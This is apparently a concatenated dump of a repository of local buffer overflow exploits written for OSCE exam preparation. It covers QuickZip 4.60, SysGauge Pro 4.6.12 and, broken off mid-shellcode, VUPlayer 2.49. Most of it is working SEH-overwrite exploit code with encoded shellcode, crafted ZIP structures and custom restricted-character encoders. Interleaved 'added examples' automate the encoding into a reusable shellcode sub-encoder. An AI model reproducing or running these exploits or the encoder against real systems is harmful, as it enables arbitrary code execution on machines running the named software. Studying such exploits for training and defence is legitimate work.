shellcode += "\x42\x75\x4a\x49\x69\x6c\x69\x78\x4c\x42\x73\x30"
shellcode += "\x37\x70\x57\x70\x55\x30\x6f\x79\x49\x75\x74\x71"
shellcode += "\x39\x50\x72\x44\x4e\x6b\x76\x30\x64\x70\x6e\x6b"
shellcode += "\x62\x72\x36\x6c\x4e\x6b\x76\x32\x34\x54\x6e\x6b"
shellcode += "\x44\x32\x74\x68\x66\x6f\x68\x37\x32\x6a\x37\x56"
shellcode += "\x35\x61\x6b\x4f\x4e\x4c\x65\x6c\x45\x31\x31\x6c"
shellcode += "\x43\x32\x64\x6c\x75\x70\x79\x51\x4a\x6f\x66\x6d"
shellcode += "\x76\x61\x6b\x77\x4d\x32\x7a\x52\x43\x62\x73\x67"
shellcode += "\x6e\x6b\x61\x42\x34\x50\x6e\x6b\x42\x6a\x75\x6c"
shellcode += "\x4c\x4b\x42\x6c\x57\x61\x63\x48\x6a\x43\x57\x38"
shellcode += "\x73\x31\x58\x51\x73\x61\x4c\x4b\x66\x39\x47\x50"
shellcode += "\x75\x51\x4e\x33\x6e\x6b\x37\x39\x32\x38\x49\x73"
shellcode += "\x74\x7a\x67\x39\x4e\x6b\x50\x34\x4e\x6b\x35\x51"
shellcode += "\x6e\x36\x56\x51\x39\x6f\x6c\x6c\x79\x51\x38\x4f"
shellcode += "\x74\x4d\x57\x71\x39\x57\x56\x58\x79\x70\x31\x65"
shellcode += "\x49\x66\x44\x43\x61\x6d\x4c\x38\x45\x6b\x63\x4d"
shellcode += "\x45\x74\x72\x55\x7a\x44\x62\x78\x6e\x6b\x76\x38"
shellcode += "\x47\x54\x76\x61\x59\x43\x70\x66\x4e\x6b\x36\x6c"
shellcode += "\x70\x4b\x4e\x6b\x71\x48\x75\x4c\x76\x61\x4e\x33"
shellcode += "\x6c\x4b\x56\x64\x6e\x6b\x46\x61\x7a\x70\x6b\x39"
shellcode += "\x71\x54\x45\x74\x57\x54\x43\x6b\x33\x6b\x75\x31"
shellcode += "\x30\x59\x61\x4a\x30\x51\x79\x6f\x39\x70\x63\x6f"
shellcode += "\x43\x6f\x30\x5a\x6c\x4b\x52\x32\x48\x6b\x6c\x4d"
shellcode += "\x43\x6d\x30\x68\x67\x43\x47\x42\x35\x50\x77\x70"
shellcode += "\x53\x58\x34\x37\x32\x53\x64\x72\x43\x6f\x46\x34"
shellcode += "\x31\x78\x72\x6c\x44\x37\x65\x76\x63\x37\x69\x6f"
shellcode += "\x6e\x35\x4c\x78\x6e\x70\x53\x31\x57\x70\x65\x50"
shellcode += "\x47\x59\x6a\x64\x71\x44\x42\x70\x70\x68\x44\x69"
shellcode += "\x6b\x30\x42\x4b\x67\x70\x4b\x4f\x38\x55\x33\x5a"
shellcode += "\x57\x78\x62\x79\x32\x70\x38\x62\x4b\x4d\x47\x30"
shellcode += "\x36\x30\x73\x70\x50\x50\x62\x48\x7a\x4a\x74\x4f"
shellcode += "\x6b\x6f\x39\x70\x69\x6f\x78\x55\x6a\x37\x32\x48"
shellcode += "\x66\x62\x73\x30\x34\x51\x51\x4c\x4c\x49\x5a\x46"
shellcode += "\x31\x7a\x42\x30\x31\x46\x66\x37\x55\x38\x68\x42"
shellcode += "\x39\x4b\x44\x77\x51\x77\x49\x6f\x4a\x75\x32\x77"
shellcode += "\x51\x78\x38\x37\x6a\x49\x75\x68\x69\x6f\x49\x6f"
shellcode += "\x6a\x75\x70\x57\x71\x78\x43\x44\x68\x6c\x67\x4b"
shellcode += "\x49\x71\x69\x6f\x69\x45\x51\x47\x6c\x57\x31\x78"
shellcode += "\x54\x35\x42\x4e\x72\x6d\x71\x71\x59\x6f\x39\x45"
shellcode += "\x45\x38\x33\x53\x72\x4d\x53\x54\x55\x50\x4c\x49"
shellcode += "\x6b\x53\x42\x77\x51\x47\x76\x37\x70\x31\x79\x66"
shellcode += "\x53\x5a\x32\x32\x73\x69\x66\x36\x49\x72\x39\x6d"
shellcode += "\x70\x66\x48\x47\x51\x54\x47\x54\x35\x6c\x35\x51"
shellcode += "\x56\x61\x6c\x4d\x47\x34\x34\x64\x32\x30\x7a\x66"
shellcode += "\x35\x50\x43\x74\x73\x64\x46\x30\x70\x56\x50\x56"
shellcode += "\x32\x76\x43\x76\x33\x66\x50\x4e\x62\x76\x43\x66"
shellcode += "\x73\x63\x32\x76\x70\x68\x62\x59\x58\x4c\x47\x4f"
shellcode += "\x6b\x36\x39\x6f\x4a\x75\x6c\x49\x69\x70\x72\x6e"
shellcode += "\x52\x76\x33\x76\x39\x6f\x76\x50\x52\x48\x46\x68"
shellcode += "\x6e\x67\x47\x6d\x33\x50\x79\x6f\x79\x45\x6f\x4b"
shellcode += "\x78\x70\x6e\x55\x79\x32\x56\x36\x73\x58\x6e\x46"
shellcode += "\x6a\x35\x4f\x4d\x4d\x4d\x59\x6f\x39\x45\x65\x6c"
shellcode += "\x77\x76\x61\x6c\x47\x7a\x4f\x70\x79\x6b\x69\x70"
shellcode += "\x62\x55\x54\x45\x6f\x4b\x51\x57\x56\x73\x64\x32"
shellcode += "\x62\x4f\x52\x4a\x37\x70\x43\x63\x4b\x4f\x49\x45"
shellcode += "\x41\x41"
####################### ZIP File Structure ########################
###################################################################
######################## Local File Header ########################
LocalFileHeader = '\x50\x4b\x03\x04' # local file header signature
LocalFileHeader += '\x14\x00' # version needed to extract 0x14 = 20 -> 2.0
LocalFileHeader += '\x00\x00' # general purpose bit flag
LocalFileHeader += '\x00\x00' # compression method
LocalFileHeader += '\xb7\xac' # file last modification time 0xacb7 -> H=21 M=37 S/2=23 -> 21:37:46 (DOS time stores seconds halved)
LocalFileHeader += '\xce\x34' # file last modification date 0x34ce -> Y=26 (1980+26) M=6 D=14 -> 2006/6/14
LocalFileHeader += '\x00\x00\x00' # CRC-32 '\x00' was left out to make sure we hit 25 bytes before file length
LocalFileHeader += '\x00\x00\x00\x00' # compressed size
LocalFileHeader += '\x00\x00\x00\x00' # uncompressed size
LocalFileHeader += '\xe4\x0f' # file name length 0x0fe4 = 4068 bytes
LocalFileHeader += '\x00\x00' # extra field length
LocalFileHeader += '\x00' # file name
#LocalFileHeader += '\x00' # extra filed
################## Central Directory File Header ##################
CDFileHeader = '\x50\x4b\x01\x02' # cd file header signature
CDFileHeader += '\x14\x00' # version made by 0x14 = 20 -> 2.0
CDFileHeader += '\x14\x00' # version needed to extract 0x14 = 20 -> 2.0
CDFileHeader += '\x00\x00' # general purpose bit flag
CDFileHeader += '\x00\x00' # compression method
CDFileHeader += '\xb7\xac' # file last modification time 0xacb7 -> H=21 M=37 S/2=23 -> 21:37:46 (DOS time stores seconds halved)
CDFileHeader += '\xce\x34' # file last modification date 0x34ce -> Y=26 (1980+26) M=6 D=14 -> 2006/6/14
CDFileHeader += '\x00\x00\x00\x00' # CRC-32
CDFileHeader += '\x00\x00\x00\x00' # compressed size
CDFileHeader += '\x00\x00\x00\x00' # uncompressed size
CDFileHeader += '\xe4\x0f' # file name length 0x0fe4 = 4068 bytes
CDFileHeader += '\x00\x00' # extra field length
CDFileHeader += '\x00\x00' # file comment length
CDFileHeader += '\x00\x00' # disk number where file starts
CDFileHeader += '\x01\x00' # internal file attributes BIT 0: apparent ASCII/text file
CDFileHeader += '\x24\x00\x00\x00' # external file attributes
CDFileHeader += '\x00\x00\x00\x00' # relative offset of local file header
#CDFileHeader += '\x00' # file name
#CDFileHeader += '\x00' # extra field
#CDFileHeader += '\x00' # file comment
################ End of Central Directory Record ##################
EOCDRHeader = '\x50\x4b\x05\x06' # End of central directory signature
EOCDRHeader += '\x00\x00' # number of this disk
EOCDRHeader += '\x00\x00' # disk where central directory starts
EOCDRHeader += '\x01\x00' # number of central directory records on this disk
EOCDRHeader += '\x01\x00' # total number of central directory records
EOCDRHeader += '\x12\x10\x00\x00' # size of central directory (4114 bytes)
EOCDRHeader += '\x02\x10\x00\x00' # offset of start of central directory, relative to start of archive
EOCDRHeader += '\x00\x00' # comment length
#EOCDRHeader += '\x00' # comment
Evil = '\x41' * 294
Evil += '\x75\x06\x74\x06' # nSEH JZ & JNZ (aka jump net)
Evil += '\x3d\x1b\x7e\x6d' # SEH pop esi,pop ebx, retn in D3DXOF.dll (OS module - WinXP SP3)
Evil += '\x41\x41' # compensate for short jump
Evil += '\x54' # PUSH ESP * save stack pointer to edi
Evil += '\x5F' # POP EDI
Evil += '\x54' # PUSH ESP * point esp to where we want to decode otherwise bad shellcode
Evil += '\x58' # POP EAX
Evil += '\x05\x24\x13\x11\x11' # ADD EAX,11111324
Evil += '\x05\x25\x16\x11\x11' # ADD EAX,11111625
Evil += '\x2D\x21\x22\x22\x22' # SUB EAX,22222221
Evil += '\x50' # PUSH EAX
Evil += '\x5C' # POP ESP * mov eax to esp
#root@kali:/opt/Slink# python Slink.py * decode the following
#Enter your shellcode: 89FC89F8054E070000FFE0 mov esp,edi restore stack pointer
#[!] Shellcode size is not divisible by 4 mov eax,edi use edi as a relative address
#[+] Padding shellcode with 1 NOPS.. add eax,0x74e align eax to the start of shellcode
#[+] Encoding [90e0ff00].. jmp eax jump to shellcode
#[!] [01] and/or [f] and/or [00] found, using alternative encoder..
Evil += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
Evil += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
Evil += "\x05\x11\x77\x61\x41" ## add eax, 0x41617711
Evil += "\x05\x11\x66\x51\x41" ## add eax, 0x41516611
Evil += "\x05\x11\x55\x61\x41" ## add eax, 0x41615511
Evil += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
Evil += "\x50" ## push eax
#[+] Encoding [00074e05]..
#[!] [01] and/or [f] and/or [00] found, using alternative encoder..
Evil += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
Evil += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
Evil += "\x05\x13\x36\x13\x11" ## add eax, 0x11133613
Evil += "\x05\x13\x25\x13\x11" ## add eax, 0x11132513
Evil += "\x05\x12\x26\x13\x11" ## add eax, 0x11132612
Evil += "\x2D\x33\x33\x32\x33" ## sub eax, 0x33323333
Evil += "\x50" ## push eax
#[+] Encoding [f889fc89]..
#[!] [01] and/or [f] and/or [00] found, using alternative encoder..
Evil += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
Evil += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
Evil += "\x05\x44\x76\x44\x74" ## add eax, 0x74447644
Evil += "\x05\x44\x65\x44\x64" ## add eax, 0x64446544
Evil += "\x05\x34\x54\x34\x53" ## add eax, 0x53345434
Evil += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
Evil += "\x50" ## push eax
Evil += '\x42' * (250-116)
Evil += shellcode
Evil += '\x41' * (4064-294-4-4-250-len(shellcode))
Evil += '.txt'
buffer = LocalFileHeader
buffer += Evil
buffer += CDFileHeader
buffer += Evil
buffer += EOCDRHeader
try:
f=open("Evil.zip","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except Exception as e:
print e
================================================
FILE: Local Buffer Overflow/QuickZipv4.60.019/README.md
================================================
### Quick Zip v4.60.019
Local SEH overwrite with restricted characters set. I thought this exploit was quite challenging yet fun!
<p align="center">
<img src="https://github.com/ihack4falafel/OSCE/blob/master/Local%20Buffer%20Overflow/QuickZipv4.60.019/PoC.gif">
</p>
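Both QuickZip exploits above hand-assemble the ZIP container (local file header, central directory entry, end-of-central-directory record) with the member-name length 0x0fe4, the central directory offset 0x1002 and its size 0x1012 hard-coded, and they deliberately write a three-byte CRC so that QuickZip's parser finds the name-length field at offset 25. The example below is added for this page and is not code from the repository: it builds the same one-member stored archive with `struct`, derives every length and offset from the member name instead of hard-coding them, uses the spec layout (four-byte CRC, name length at offset 26) so the standard library accepts it, and decodes the exploits' DOS timestamp words (which, since DOS time stores seconds halved, are 2006-06-14 21:37:46). The 4068-byte member name is the only assumption, taken from the exploits.

```python
# Added example (not from the repository): build the one-member stored ZIP the
# QuickZip exploits assemble by hand, deriving every length and offset from the
# member name instead of hard-coding them, then read it back with the stdlib.
import io
import struct
import zipfile
import zlib

DOS_TIME = 0xACB7   # the raw DOS time/date words used by the exploits
DOS_DATE = 0x34CE

LOCAL_HDR = "<4sHHHHHIIIHH"          # 30 bytes, then file name, extra, data
CENTRAL_HDR = "<4sHHHHHHIIIHHHHHII"  # 46 bytes, then file name, extra, comment
EOCD = "<4sHHHHIIH"                  # 22 bytes, then archive comment

def dos_datetime(dos_time, dos_date):
    """Decode MS-DOS packed time/date: years count from 1980, seconds are halved."""
    return (1980 + (dos_date >> 9), (dos_date >> 5) & 0xF, dos_date & 0x1F,
            dos_time >> 11, (dos_time >> 5) & 0x3F, (dos_time & 0x1F) * 2)

def build_zip(name, data=b"", dos_time=DOS_TIME, dos_date=DOS_DATE):
    """Return a ZIP holding one stored member.  `name` is bytes because the
    overflow in the exploits lives in this field; data is stored uncompressed."""
    crc = zlib.crc32(data) & 0xFFFFFFFF
    local = struct.pack(LOCAL_HDR,
                        b"PK\x03\x04",   # local file header signature
                        20,              # version needed to extract: 2.0
                        0,               # general purpose bit flag
                        0,               # compression method: stored
                        dos_time, dos_date,
                        crc, len(data), len(data),
                        len(name), 0)    # file name length, extra field length
    local += name + data
    central = struct.pack(CENTRAL_HDR,
                          b"PK\x01\x02",   # central directory header signature
                          20, 20,          # version made by / needed to extract
                          0, 0,            # flags, compression method
                          dos_time, dos_date,
                          crc, len(data), len(data),
                          len(name), 0, 0, # name, extra, comment lengths
                          0,               # disk number where the file starts
                          1,               # internal attrs: apparent text file
                          0x24,            # external attrs (value the exploits use)
                          0)               # offset of the local header
    central += name
    eocd = struct.pack(EOCD,
                       b"PK\x05\x06",
                       0, 0,              # this disk, disk holding the directory
                       1, 1,              # entries on this disk / in total
                       len(central),      # size of the central directory
                       len(local),        # offset of the central directory
                       0)                 # comment length
    return local + central + eocd

def parse_eocd(archive):
    """Read the EOCD record (no comment) and return (cd_size, cd_offset)."""
    fields = struct.unpack(EOCD, archive[-22:])
    if fields[0] != b"PK\x05\x06":
        raise ValueError("no end-of-central-directory record at end of archive")
    return fields[5], fields[6]

def read_back(archive):
    """Let the standard library parse it: [(member name, member data), ...]."""
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        return [(info.filename, zf.read(info)) for info in zf.infolist()]

if __name__ == "__main__":
    name = b"A" * 4064 + b".txt"            # 4068-byte member name, as in the exploits
    archive = build_zip(name)
    print("central directory size %d at offset %d" % parse_eocd(archive))
    print("timestamp %04d-%02d-%02d %02d:%02d:%02d" % dos_datetime(DOS_TIME, DOS_DATE))
    print("zipfile reads back a %d-char name" % len(read_back(archive)[0][0]))
```

With the 4068-byte name, `parse_eocd` returns (4114, 4098), the same 0x1012 and 0x1002 the exploits hard-code; the member name is the `Evil` buffer, so the SEH offsets inside it are unaffected by this layout change. Swapping in the exploits' shifted local header would make `zipfile` reject the archive while QuickZip still parses it, which is a handy way to confirm the parser quirk the exploits rely on.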
================================================
FILE: Local Buffer Overflow/SysGaugeProv4.6.12/Exploit.py
================================================
#!/usr/bin/python
##################################################################################################################
# Exploit Title : SysGauge Pro v4.6.12 - Local Buffer Overflow (SEH) #
# Exploit Author : Hashim Jawad #
# Twitter : @ihack4falafel #
# Author Website : ihack4falafel[.]com #
# Vendor Homepage : http://www.sysgauge.com/ #
# Vulnerable Software : http://www.sysgauge.com/setups/sysgaugepro_setup_v4.6.12.exe #
# Tested on : Windows XP Professional - SP3 #
# Steps to reproduce : ~ Copy content of payload.txt #
# ~ Under Register type in "falafel" in Customer Name field #
# ~ Paste the content of payload.txt in Unlock Key field and click Register #
##################################################################################################################
import struct
# ***notes***
# ~ this particular function [Register] of the program only accepts characters [00-7f] excluding "\x00\x09\x0a\x0d"
# ~ found two application dlls [QtGui4.dll] & [libdgg.dll] that have plenty of [pop, pop, ret] with clean addresses
# ~ the following Flexense products are affected by the same vulnerability (note buffer size and offsets may vary)
##################################################################################################################
# ~ SysGauge Ultimate v4.6.12
# ~ Azure DEX Pro v2.2.16
# ~ Azure DEX Ultimate v2.2.16
# ~ DiskBoss Pro v9.1.16
# ~ DiskBoss Ultimate v9.1.16
# ~ SyncBreeze Pro v10.7.14
# ~ SyncBreeze Ultimate v10.7.14
# ~ DiskPulse Pro v10.7.14
# ~ DiskPulse Ultimate v10.7.14
# ~ DiskSavvy Pro v10.7.14
# ~ DiskSavvy Ultimate v10.7.14
# ~ DiskSorter Pro v10.7.14
# ~ DiskSorter Ultimate v10.7.14
# ~ DupScout Pro v10.7.14
# ~ DupScout Ultimate v10.7.14
# ~ VX Search Pro v10.7.14
# ~ VX Search Ultimate v10.7.14
##################################################################################################################
# overwrite SEH with clean address of [pop, pop, ret]
buffer = "\x41" * 780 # junk to nSEH
buffer += "\x74\x06\x42\x42" # nSEH - jump if zero flag is set (always true)
buffer += struct.pack('<L', 0x10013d16) # SEH (pop esi # pop ecx # retn | [libdgg.dll])
buffer += "\x43" * 28 # some more junk
# push calc.exe instructions [encoded] into the stack
# Disassembly:
# 0: 33 c0 xor eax,eax # zero out eax register
# 2: 50 push eax # push eax (null-byte) to terminate "calc.exe"
# 3: 68 2E 65 78 65 push ".exe" # push the ASCII string to the stack
# 8: 68 63 61 6C 63 push "calc" #
# d: 8b c4 mov eax,esp # put the pointer to the ASCII string in eax
# f: 6a 01 push 0x1 # push uCmdShow parameter to the stack
# 11: 50 push eax # push the pointer to lpCmdLine to the stack
# 12: bb 5d 2b 86 7c mov ebx,0x7c862b5d # move the pointer to WinExec() [located at 0x7c862b5d in kernel32.dll (via arwin.exe) on WinXP SP3] into ebx
# 17: ff d3 call ebx # call WinExec()
# divide calc.exe instructions to 4-byte chunks and pad what's left with nops
# "\x33\xc0\x50\x68"
# "\x2e\x65\x78\x65"
# "\x68\x63\x61\x6C"
# "\x63\x8b\xc4\x6a"
# "\x01\x50\xbb\x5d"
# "\x2b\x86\x7c\xff"
# "\xd3\x90\x90\x90"
# starting from the bottom up in little endian order
# first push "\x90\x90\x90\xd3"
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10" ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01" ### and eax, 0x01010101
# move "\x90\x90\x90\xd3" into eax and push it to the stack
buffer += "\x05\x72\x70\x70\x70" ### add eax,0x70707072
buffer += "\x05\x61\x20\x20\x20" ### add eax,0x20202061
buffer += "\x50" ### push eax
##############################################################
# second push "\xff\x7c\x86\x2b"
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10" ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01" ### and eax, 0x01010101
# move "\xff\x7c\x86\x2b" into eax and push it to the stack
buffer += "\x05\x01\x32\x35\x66" ### add eax,0x66353201
buffer += "\x05\x15\x32\x35\x66" ### add eax,0x66353215
buffer += "\x05\x15\x22\x12\x33" ### add eax,0x33122215
buffer += "\x50" ### push eax
##############################################################
# third push "\x5d\xbb\x50\x01"
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10" ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01" ### and eax, 0x01010101
# move "\x5d\xbb\x50\x01" into eax and push it to the stack
buffer += "\x05\x01\x30\x65\x36" ### add eax,0x36653001
buffer += "\x05\x01\x20\x56\x27" ### add eax,0x27562001
buffer += "\x48" ### dec eax
buffer += "\x50" ### push eax
##############################################################
# fourth push "\x6a\xe0\x89\x63" (see note below)
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10" ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01" ### and eax, 0x01010101
# the two immediates below sum to 0x6ae08963, not the 0x6ac48b63 that chunk "\x63\x8b\xc4\x6a" calls for,
# so the bytes landing on the stack are 63 89 e0 6a; "\x89\xe0" is the other encoding of mov eax,esp,
# so the pushed stub is still correct
buffer += "\x05\x32\x46\x70\x35" ### add eax,0x35704632
buffer += "\x05\x31\x43\x70\x35" ### add eax,0x35704331
buffer += "\x50" ### push eax
##############################################################
# fifth push "\x6c\x61\x63\x68"
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10" ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01" ### and eax, 0x01010101
# move "\x6c\x61\x63\x68" into eax and push it to the stack
buffer += "\x05\x34\x32\x31\x36" ### add eax,0x36313234
buffer += "\x05\x34\x31\x30\x36" ### add eax,0x36303134
buffer += "\x50" ### push eax
##############################################################
# sixth push "\x65\x78\x65\x2e"
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10" ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01" ### and eax, 0x01010101
# move "\x65\x78\x65\x2e" into eax and push it to the stack
buffer += "\x05\x17\x33\x34\x33" ### add eax,0x33343317
buffer += "\x05\x17\x32\x44\x32" ### add eax,0x32443217
buffer += "\x50" ### push eax
##############################################################
# seventh push "\x68\x50\xc0\x33"
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10" ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01" ### and eax, 0x01010101
# move "\x68\x50\xc0\x33" into eax and push it to the stack
buffer += "\x05\x22\x60\x30\x34" ### add eax,0x34306022
buffer += "\x05\x11\x60\x20\x34" ### add eax,0x34206011
buffer += "\x50" ### push eax
##############################################################
# push 20 nops to the stack for padding
##############################################################
# zero out eax
buffer += "\x25\x10\x10\x10\x10" ### and eax, 0x10101010
buffer += "\x25\x01\x01\x01\x01" ### and eax, 0x01010101
# move "\x90\x90\x90\x90" into eax and push it to the stack
buffer += "\x05\x70\x70\x70\x70" ### add eax,0x70707070
buffer += "\x05\x20\x20\x20\x20" ### add eax,0x20202020
buffer += "\x50" ### push eax
buffer += "\x50" ### push eax
buffer += "\x50" ### push eax
buffer += "\x50" ### push eax
buffer += "\x50" ### push eax
##############################################################
# push "jmp esp" address [encoded] to the stack
# 0x6709e053 : "\xff\xe4" | [QtCore4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, (C:\Program Files\SysGauge Pro\bin\QtCore4.dll)
# 0: 25 10 10 10 10 and eax,0x10101010
# 5: 25 01 01 01 01 and eax,0x1010101
# a: 05 31 70 03 34 add eax,0x34037031
# f: 05 22 70 06 33 add eax,0x33067022
# 14: 50 push eax
buffer += "\x25\x10\x10\x10\x10\x25\x01\x01\x01\x01\x05\x31\x70\x03\x34\x05\x22\x70\x06\x33\x50"
# the program converts "\xff" to "c3" [retn instruction] thus popping previously pushed to the stack address "jmp esp" to eip ;)
buffer += "\xff"
buffer += "C" * (50000-780-4-4-28-21-21-26-22-21-21-21-21-25-1) ### junk
try:
f=open("payload.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
================================================
FILE: Local Buffer Overflow/SysGaugeProv4.6.12/readme.md
================================================
### SysGauge Pro v4.6.12
Structured Exception Handler (SEH) chain overwrite exploit found during my prep to take on OSCE, had to make custom shellcode/encoder in order to bypass bad character limitations. See the link [EDB-ID: 44455](https://www.exploit-db.com/exploits/44455/)
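The SysGauge exploit above builds its WinExec stub by hand for a field that only accepts bytes 01-7f: zero EAX with two ANDs whose immediates AND to zero, ADD immediates made only of allowed bytes until EAX holds the wanted dword, PUSH EAX, and repeat from the last four-byte chunk backwards so the stub ends up in order on the stack; the QuickZip exploits do the same for their alphanumeric-ish charset with Slink. The following is an added example written for this page, not code from the repository or from Slink, that automates that search for an arbitrary allowed byte set and checks the result with a tiny emulator. Assumptions: the allowed set (0x01-0x7f minus \x09 \x0a \x0d) is taken from the exploit notes; the 25-byte stub is reconstructed from the exploit's disassembly comment, including its XP SP3 WinExec address; and the encoder reaches awkward values with a third ADD instead of the exploit's DEC trick.

```python
# Added example (not the repository's or Slink's code): automate the AND/ADD/PUSH
# sub-encoding that the SysGauge and QuickZip exploits perform by hand.
import struct

def allowed_bytes(lo=0x01, hi=0x7f, bad=(0x09, 0x0a, 0x0d)):
    """Allowed bytes for the SysGauge Unlock Key field, per the exploit notes."""
    return [b for b in range(lo, hi + 1) if b not in bad]

ALLOWED = allowed_bytes()

# 25-byte WinExec("calc.exe") stub reconstructed from the exploit's disassembly
# comment (WinExec address is the XP SP3 value given there); most bytes are bad.
CALC_STUB = (b"\x33\xc0\x50"            # xor eax,eax ; push eax (NUL)
             b"\x68.exe" b"\x68calc"   # push ".exe" ; push "calc"
             b"\x8b\xc4\x6a\x01\x50"   # mov eax,esp ; push 1 ; push eax
             b"\xbb\x5d\x2b\x86\x7c"   # mov ebx,WinExec
             b"\xff\xd3")              # call ebx

def find_zero_pair(allowed):
    """Two allowed bytes x, y with x & y == 0: AND EAX,xxxx / AND EAX,yyyy clears EAX."""
    for x in allowed:
        for y in allowed:
            if x & y == 0:
                return x, y
    raise ValueError("no pair of allowed bytes ANDs to zero")

def split_dword(target, allowed, n_adds):
    """n_adds immediates of allowed bytes whose sum mod 2**32 is target, found
    column by column from the low byte with carry; the last addend is computed."""
    want = struct.pack("<I", target)
    ok = set(allowed)
    parts = [bytearray(4) for _ in range(n_adds)]

    def solve(col, carry):
        if col == 4:
            return True                  # carry out of the top byte is discarded
        def choose(i, acc):
            if i == n_adds - 1:
                last = (want[col] - acc - carry) % 256
                if last not in ok:
                    return False
                parts[i][col] = last
                return solve(col + 1, (acc + carry + last) // 256)
            for b in allowed:
                parts[i][col] = b
                if choose(i + 1, acc + b):
                    return True
            return False
        return choose(0, 0)

    if solve(0, 0):
        return [struct.unpack("<I", bytes(p))[0] for p in parts]
    return None

def encode_push(target, allowed):
    """AND EAX,imm ; AND EAX,imm ; ADD EAX,imm ... ; PUSH EAX for one dword."""
    for opcode in (0x25, 0x05, 0x50):    # and eax,imm32 / add eax,imm32 / push eax
        if opcode not in allowed:
            raise ValueError("opcode %#04x is a bad character" % opcode)
    x, y = find_zero_pair(allowed)
    code = b"\x25" + bytes([x] * 4) + b"\x25" + bytes([y] * 4)
    for n_adds in (1, 2, 3, 4):          # use the fewest ADDs that reach the value
        imms = split_dword(target, allowed, n_adds)
        if imms is not None:
            break
    else:
        raise ValueError("cannot reach %#010x with the allowed bytes" % target)
    for imm in imms:
        code += b"\x05" + struct.pack("<I", imm)
    return code + b"\x50"

def pad4(shellcode, nop=b"\x90"):
    """Pad to a multiple of four bytes so every chunk is exactly one PUSH."""
    return shellcode + nop * (-len(shellcode) % 4)

def encode_shellcode(shellcode, allowed):
    """Push the padded shellcode last dword first, so that after the final PUSH
    ESP points at its first byte (hence the exploit ends with a 'jmp esp')."""
    padded = pad4(shellcode)
    chunks = [padded[i:i + 4] for i in range(0, len(padded), 4)]
    return b"".join(encode_push(struct.unpack("<I", c)[0], allowed)
                    for c in reversed(chunks))

def emulate(code, eax=0xDEADBEEF):
    """Run the emitted opcodes; return the stack, lowest address first, i.e. the
    bytes a later 'jmp esp' would execute.  EAX starts with garbage on purpose."""
    stack, i = b"", 0
    while i < len(code):
        op = code[i]
        if op in (0x25, 0x05):           # and / add eax, imm32
            imm = struct.unpack("<I", code[i + 1:i + 5])[0]
            eax = eax & imm if op == 0x25 else (eax + imm) & 0xFFFFFFFF
            i += 5
        elif op == 0x50:                 # push eax: the stack grows downward
            stack = struct.pack("<I", eax) + stack
            i += 1
        else:
            raise ValueError("unexpected opcode %#04x at offset %d" % (op, i))
    return stack
```

`encode_shellcode(CALC_STUB, ALLOWED)` yields a byte string consisting only of allowed characters, and `emulate()` of it returns the 28-byte padded stub exactly, which is the check worth running before pasting anything into the target: the exploit's own fourth chunk shows how easily a hand-computed immediate drifts from the value in the comment. For a different sink (for instance the QuickZip filename) only `allowed_bytes()` changes; `find_zero_pair` and `split_dword` adapt the AND pair and the number of ADDs automatically, and raise instead of silently emitting a bad character.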

================================================
FILE: Local Buffer Overflow/VUPlayerv2.49/Exploit.py
================================================
#!/usr/bin/env python
import struct
import time
#root@kali:~# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x09\x0a\x0d\x1a" -f python -v shellcode (227 bytes)
shellcode = ""
shellcode += "\xbb\xc7\x16\xe0\xde\xda\xcc\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
shellcode += "\x33\x83\xc0\x04\x31\x58\x0e\x03\x9f\x18\x02\x2b\xe3\xcd\x4b"
shellcode += "\xd4\x1b\x0e\x2c\x5c\xfe\x3f\x7e\x3a\x8b\x12\x4e\x48\xd9\x9e"
shellcode += "\x25\x1c\xc9\x15\x4b\x89\xfe\x9e\xe6\xef\x31\x1e\xc7\x2f\x9d"
shellcode += "\xdc\x49\xcc\xdf\x30\xaa\xed\x10\x45\xab\x2a\x4c\xa6\xf9\xe3"
shellcode += "\x1b\x15\xee\x80\x59\xa6\x0f\x47\xd6\x96\x77\xe2\x28\x62\xc2"
shellcode += "\xed\x78\xdb\x59\xa5\x60\x57\x05\x16\x91\xb4\x55\x6a\xd8\xb1"
shellcode += "\xae\x18\xdb\x13\xff\xe1\xea\x5b\xac\xdf\xc3\x51\xac\x18\xe3"
shellcode += "\x89\xdb\x52\x10\x37\xdc\xa0\x6b\xe3\x69\x35\xcb\x60\xc9\x9d"
shellcode += "\xea\xa5\x8c\x56\xe0\x02\xda\x31\xe4\x95\x0f\x4a\x10\x1d\xae"
shellcode += "\x9d\x91\x65\x95\x39\xfa\x3e\xb4\x18\xa6\x91\xc9\x7b\x0e\x4d"
shellcode += "\x6c\xf7\xbc\x9a\x16\x5a\xaa\x5d\x9a\xe0\x93\x5e\xa4\xea\xb3"
shellcode += "\x36\x95\x61\x5c\x40\x2a\xa0\x19\xbe\x60\xe9\x0b\x57\x2d\x7b"
